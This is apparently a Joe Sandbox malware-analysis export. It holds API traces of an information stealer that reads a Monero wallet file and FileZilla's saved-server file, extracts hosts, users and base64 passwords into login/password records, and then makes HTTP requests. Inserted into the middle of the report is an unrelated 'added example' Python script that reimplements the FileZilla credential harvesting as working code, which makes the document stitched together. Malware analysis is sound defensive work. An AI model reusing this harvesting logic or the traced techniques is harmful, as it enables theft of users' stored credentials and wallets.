                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b6bf5c727abaaf4529eec381613256db92bcd2500381c1d6bbbfa4ba0ff016f1
                                  • Instruction ID: f8c8f579090461cb5fa4f4062a8ba0e95be9aec5b33bc4f6d6432fcc18dd3e44
                                  • Opcode Fuzzy Hash: b6bf5c727abaaf4529eec381613256db92bcd2500381c1d6bbbfa4ba0ff016f1
                                  • Instruction Fuzzy Hash: F2516BB369C100CBD304BD28ECD5636B6D6ABA4318F35496EE5C3D7B64E830C942D752
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1ff0d82487f5e1be3889bfba5c7ee1c5fea292d335541c9a36dfe339444cff9d
                                  • Instruction ID: 75bac932e892f9718f8d3b2cadc9b8d8e7f0400cf88d3d1f201e725161ba2585
                                  • Opcode Fuzzy Hash: 1ff0d82487f5e1be3889bfba5c7ee1c5fea292d335541c9a36dfe339444cff9d
                                  • Instruction Fuzzy Hash: 5B51F8F3A086045BF3186E29EC9177AB7D6EFC4320F1A853DDBC6877C4D9381845869A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction ID: b7a8b64ed22039c839b3b18d4bfc009e7f5972f46b56a100aa059116007a1279
                                  • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction Fuzzy Hash: 31512972E09BD589C7058B7944502EEBFB21FE6210F1E829EC4981B382C6799689D3E5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 93aaebdb7fdcf98571920cbca83bb3eea479cf7685c5cf38a044cdd38f344c21
                                  • Instruction ID: 6c856593f81a6065abada54f8a552aa6d591d707a7975e3092d089a10fa567e4
                                  • Opcode Fuzzy Hash: 93aaebdb7fdcf98571920cbca83bb3eea479cf7685c5cf38a044cdd38f344c21
                                  • Instruction Fuzzy Hash: 323168F390C2045FF304EEB9EC9476BB3A9DB94350F1A853DEAC9C3744E93659118686
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 31e425bdebfaecf87acffe3c576b1994a1a6b3d94d2d30e3b8b562e8ae5bab4e
                                  • Instruction ID: 0b6d2f36d5581be543e2ba18cb242ae6c38a208619174d0f08c95253fe4d7bd8
                                  • Opcode Fuzzy Hash: 31e425bdebfaecf87acffe3c576b1994a1a6b3d94d2d30e3b8b562e8ae5bab4e
                                  • Instruction Fuzzy Hash: C131D2B25086109FD744AE2CE8C177AB7E9EF48320F06493EEBC5C3784D63458518B97
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2fddcbebb393760b1a397a93975997411e60e32fae10d4b772e1ef0e86480022
                                  • Instruction ID: 36460147137586359e8edf2868496284addef55d4d929127956be643614d08de
                                  • Opcode Fuzzy Hash: 2fddcbebb393760b1a397a93975997411e60e32fae10d4b772e1ef0e86480022
                                  • Instruction Fuzzy Hash: 211123B361C708CBDB4CBA299CE163ABADED798350E20C17EA68343749FE7005449296
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                  • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                  • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                  • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006C8F9B
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006BA13C
                                    • Part of subcall function 006BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006BA161
                                    • Part of subcall function 006BA110: LocalAlloc.KERNEL32(00000040,?), ref: 006BA181
                                    • Part of subcall function 006BA110: ReadFile.KERNEL32(000000FF,?,00000000,006B148F,00000000), ref: 006BA1AA
                                    • Part of subcall function 006BA110: LocalFree.KERNEL32(006B148F), ref: 006BA1E0
                                    • Part of subcall function 006BA110: CloseHandle.KERNEL32(000000FF), ref: 006BA1EA
                                    • Part of subcall function 006C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006C8FE2
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,006D0DBF,006D0DBE,006D0DBB,006D0DBA), ref: 006C04C2
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C04C9
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 006C04E5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C04F3
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 006C052F
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C053D
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 006C0579
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C0587
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 006C05C3
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C05D5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C0662
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C067A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C0692
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C06AA
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 006C06C2
                                  • lstrcat.KERNEL32(?,profile: null), ref: 006C06D1
                                  • lstrcat.KERNEL32(?,url: ), ref: 006C06E0
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C06F3
                                  • lstrcat.KERNEL32(?,006D1770), ref: 006C0702
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C0715
                                  • lstrcat.KERNEL32(?,006D1774), ref: 006C0724
                                  • lstrcat.KERNEL32(?,login: ), ref: 006C0733
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C0746
                                  • lstrcat.KERNEL32(?,006D1780), ref: 006C0755
                                  • lstrcat.KERNEL32(?,password: ), ref: 006C0764
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C0777
                                  • lstrcat.KERNEL32(?,006D1790), ref: 006C0786
                                  • lstrcat.KERNEL32(?,006D1794), ref: 006C0795
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0DB7), ref: 006C07EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: 58f59a5ee90e3d56b71a5bb32b662e8aae32c4b2bd3132546620a26b5faee409
                                  • Instruction ID: 11ac7fa6389000cb14742f518918706c407257ac2303b30072d15bda3adc41d3
                                  • Opcode Fuzzy Hash: 58f59a5ee90e3d56b71a5bb32b662e8aae32c4b2bd3132546620a26b5faee409
                                  • Instruction Fuzzy Hash: C0D11A71D14208ABDB44EBE0DD96FFEB33AEF14304F50855DF112A61A1EE70AA44CB69
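Added example (Python, written for this editorial pass; it is not code from the Joe Sandbox report or from the sample). The function traced above resolves FileZilla's recentservers.xml under %APPDATA% and, rather than parsing XML, runs StrStrA for the literals <Host>, <Port>, <User> and <Pass encoding="base64"> and then lstrcat's the values behind the labels browser: FileZilla, profile: null, url: , login: and password: . The 0x000F423F (999,999) on the stack at the GetProcessHeap/RtlAllocateHeap pair is consistent with a roughly 1 MB output buffer. FileZilla's base64 "encoding" is reversible by anything that can read the file; only a master password changes the encoding to a form the search string above does not match. The script reproduces the harvesting on a constructed recentservers.xml and adds the defender-side view an incident responder needs: which (host, user) pairs were recoverable in clear and must be rotated. The field separators (':' between host and port, newline between fields), the XML sample and the master-password attribute layout are assumptions; the report does not show the decrypted separator strings.

```python
"""Added example, not code from the Joe Sandbox report or from the analysed sample."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed input in the layout FileZilla writes to
# %APPDATA%\FileZilla\recentservers.xml. The second entry carries a non-base64
# encoding, as FileZilla does once a master password is set; the exact
# attribute layout of that case is an assumption.
SAMPLE_RECENTSERVERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">U3VwM3JTM2NyM3Q=</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.internal.test</Host>
      <Port>2222</Port>
      <Protocol>1</Protocol>
      <User>backup</User>
      <Pass encoding="crypt" salt="c2FsdA==">AAAAAAAA</Pass>
      <Logontype>1</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""

# The exact literal the sample hands to StrStrA; a master-password entry does not match it.
PASS_B64_MARKER = '<Pass encoding="base64">'


@dataclass
class FileZillaEntry:
    host: str
    port: str
    user: str
    password: Optional[str]  # None when no base64 password was present


def _tag_text(block: str, tag: str) -> str:
    """StrStrA-style: find the opening tag by substring, take text up to the closing tag."""
    open_tag, close_tag = f"<{tag}>", f"</{tag}>"
    start = block.find(open_tag)
    if start == -1:
        return ""
    start += len(open_tag)
    end = block.find(close_tag, start)
    return block[start:end] if end != -1 else ""


def parse_recentservers(xml_text: str) -> List[FileZillaEntry]:
    """One entry per <Server> element. Bounding each search to one element is a
    deliberate improvement over an unbounded StrStrA chain, which would pair a host
    with the next base64 password in the file even if it belongs to a later server."""
    entries: List[FileZillaEntry] = []
    for m in re.finditer(r"<Server>(.*?)</Server>", xml_text, re.S):
        block = m.group(1)
        password = None
        p = block.find(PASS_B64_MARKER)
        if p != -1:
            q = block.find("</Pass>", p)
            if q == -1:
                q = len(block)
            raw = block[p + len(PASS_B64_MARKER):q].strip()
            password = base64.b64decode(raw).decode("utf-8", "replace")
        entries.append(FileZillaEntry(_tag_text(block, "Host"), _tag_text(block, "Port"),
                                      _tag_text(block, "User"), password))
    return entries


def format_record(e: FileZillaEntry) -> str:
    """The five labels are the literal strings in the trace. The ':' joining host and
    port and the newline between fields are assumptions (decrypted at run time)."""
    password = e.password if e.password is not None else ""
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {e.host}:{e.port}\n"
        f"login: {e.user}\n"
        f"password: {password}\n"
    )


def harvest(xml_text: str) -> str:
    """What the sample would append to its output buffer for this file."""
    return "".join(format_record(e) for e in parse_recentservers(xml_text))


def needs_rotation(xml_text: str) -> List[Tuple[str, str]]:
    """Defender view: (host, user) pairs whose password was recoverable in clear."""
    return [(e.host, e.user) for e in parse_recentservers(xml_text) if e.password is not None]


if __name__ == "__main__":
    print(harvest(SAMPLE_RECENTSERVERS_XML), end="")
    print("rotate:", needs_rotation(SAMPLE_RECENTSERVERS_XML))
```

Run it against a real recentservers.xml (and sitemanager.xml, which uses the same element layout) from an affected host to get the rotation list; entries that come back with password None were protected by a master password and were not exposed by this search string.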
                                  APIs
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006B4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006B4889
                                    • Part of subcall function 006B4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 006B4899
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006B5A48
                                  • StrCmpCA.SHLWAPI(?,0147EA58), ref: 006B5A63
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006B5BE3
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0147EAA8,00000000,?,0147A330,00000000,?,006D1B4C), ref: 006B5EC1
                                  • lstrlen.KERNEL32(00000000), ref: 006B5ED2
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 006B5EE3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006B5EEA
                                  • lstrlen.KERNEL32(00000000), ref: 006B5EFF
                                  • lstrlen.KERNEL32(00000000), ref: 006B5F28
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 006B5F41
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 006B5F6B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 006B5F7F
